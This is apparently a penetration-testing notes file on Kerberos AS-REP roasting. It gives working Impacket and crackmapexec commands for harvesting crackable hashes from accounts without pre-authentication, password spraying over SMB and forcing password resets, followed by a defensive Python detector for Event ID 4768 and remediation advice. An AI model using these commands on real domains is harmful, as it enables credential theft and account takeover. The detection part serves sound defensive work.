killchain-compendium/enumeration/docs/kerberoast.md


Kerberoast

Usage

* Use Impacket's GetNPUsers.py to get hashes for the users in `users.txt` (it returns them for accounts that do not require Kerberos pre-authentication):

```
GetNPUsers.py -no-pass <DomainName>/ -usersfile users.txt -format john -outputfile hashes
```

* Use crackmapexec to gain access to further user accounts with the password of the user found with GetNPUsers.py:

```
crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
```

* Watch out for `STATUS_PASSWORD_MUST_CHANGE` in the results.
* Change the password with smbpasswd.py:

```
smbpasswd.py <user>@$TARGET_IP -newpass password123
```
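
From the defender's side, the GetNPUsers.py request above shows up on the domain controller as Event ID 4768 with `PreAuthType` 0. The following is an added example, not part of the original notes: it assumes the events were exported to CSV with the event's own field names, and the function name and sample rows are constructed for illustration.

```python
import csv
import io
from collections import defaultdict

# Constructed sample (not real data): Event ID 4768 records exported as CSV,
# with columns named after the event's EventData fields.
SAMPLE_4768 = """\
TimeCreated,TargetUserName,IpAddress,Status,TicketEncryptionType,PreAuthType
2024-01-10T09:00:01,alice,::ffff:10.0.0.21,0x0,0x12,2
2024-01-10T09:14:30,svc_backup,::ffff:10.0.0.99,0x0,0x17,0
2024-01-10T09:14:31,svc_print,::ffff:10.0.0.99,0x0,0x17,0
2024-01-10T09:14:31,bob,::ffff:10.0.0.99,0x19,0xffffffff,-
2024-01-10T09:20:00,legacy_app,::ffff:10.0.0.40,0x0,0x12,0
"""

RC4_HMAC = "0x17"  # RC4-HMAC ticket encryption type


def find_preauth_less_tgts(csv_text, burst_threshold=2):
    """Return (hits, bursts).

    hits:   TGTs issued successfully (Status 0x0) with PreAuthType 0.
    bursts: source IPs that obtained such TGTs for at least
            burst_threshold distinct accounts, the pattern a user-list
            sweep leaves behind.
    """
    hits = []
    users_by_ip = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Status"].lower() != "0x0" or row["PreAuthType"].strip() != "0":
            continue
        ip = row["IpAddress"]
        if ip.startswith("::ffff:"):  # IPv4-mapped form used in the log
            ip = ip[len("::ffff:"):]
        user = row["TargetUserName"]
        hits.append({"time": row["TimeCreated"], "user": user, "ip": ip,
                     "rc4": row["TicketEncryptionType"].lower() == RC4_HMAC})
        if user not in users_by_ip[ip]:
            users_by_ip[ip].append(user)
    bursts = {ip: u for ip, u in users_by_ip.items() if len(u) >= burst_threshold}
    return hits, bursts


if __name__ == "__main__":
    hits, bursts = find_preauth_less_tgts(SAMPLE_4768)
    for h in hits:
        print(h)
    print("sweep-like sources:", bursts)
```

Every account the function reports has "Do not require Kerberos preauthentication" set; clearing that flag where it is not needed removes the exposure the first step relies on.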